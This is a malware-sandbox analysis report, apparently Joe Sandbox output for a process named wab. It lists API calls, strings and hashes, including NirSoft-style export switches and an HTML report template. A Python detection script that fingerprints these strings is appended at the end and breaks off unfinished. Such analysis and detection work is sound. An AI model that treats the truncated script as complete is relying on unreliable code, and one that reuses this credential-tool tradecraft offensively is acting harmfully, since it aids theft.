                                                                                                                                                                                                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                          • String ID: ---
                                                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                          • API String ID: 4233704886-1717621600
                                                                                                                                                                                                          • Opcode ID: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
• Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
• memcpy.MSVCRT ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
• Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
• Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
• Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
• Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
• Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
• Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
• Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
• Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
• Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
• Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
• Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
Uniqueness
Uniqueness Score: -1.00%
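The string entries in the two function records above (the HTML report template that links to nirsoft.net, and the list of shell-folder value names) are the kind of artifact an analyst would confirm directly in the raw `.sdmp` memory dump rather than trust a single signature hit. The following is an added triage example, not code from the Joe Sandbox report, from NirSoft, or from the analysed sample. It scans a dump for those strings in both ANSI and UTF-16LE (the report does not say which encoding each string is stored in, so both are tried) and only reports a match when several distinct fingerprints co-occur, because a lone `<table dir="rtl">` or `Start Menu` string is common in benign binaries. The dump bytes, the image base, and the fingerprint names are constructed for the example.

```python
"""Scan a process memory dump for the NirSoft HTML report-template strings
and shell-folder names listed in the report. Added triage example; not code
from the report or the sample. Fingerprint text is copied verbatim from the
report's Strings entries; the dump and names below are constructed."""
import re
from typing import Dict, List, Tuple

# Verbatim strings from the function records above. Names are our own labels.
FINGERPRINTS: Dict[str, str] = {
    "html_doctype": '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
    "html_rtl_table": '<table dir="rtl"><tr><td>',
    "html_nirsoft_link": '<a href="http://www.nirsoft.net/" target="newwin">',
    "html_meta_charset": "<meta http-equiv='content-type' content='text/html;charset=%s'>",
    "shell_common_startup": "Common Startup",
    "shell_start_menu": "Start Menu",
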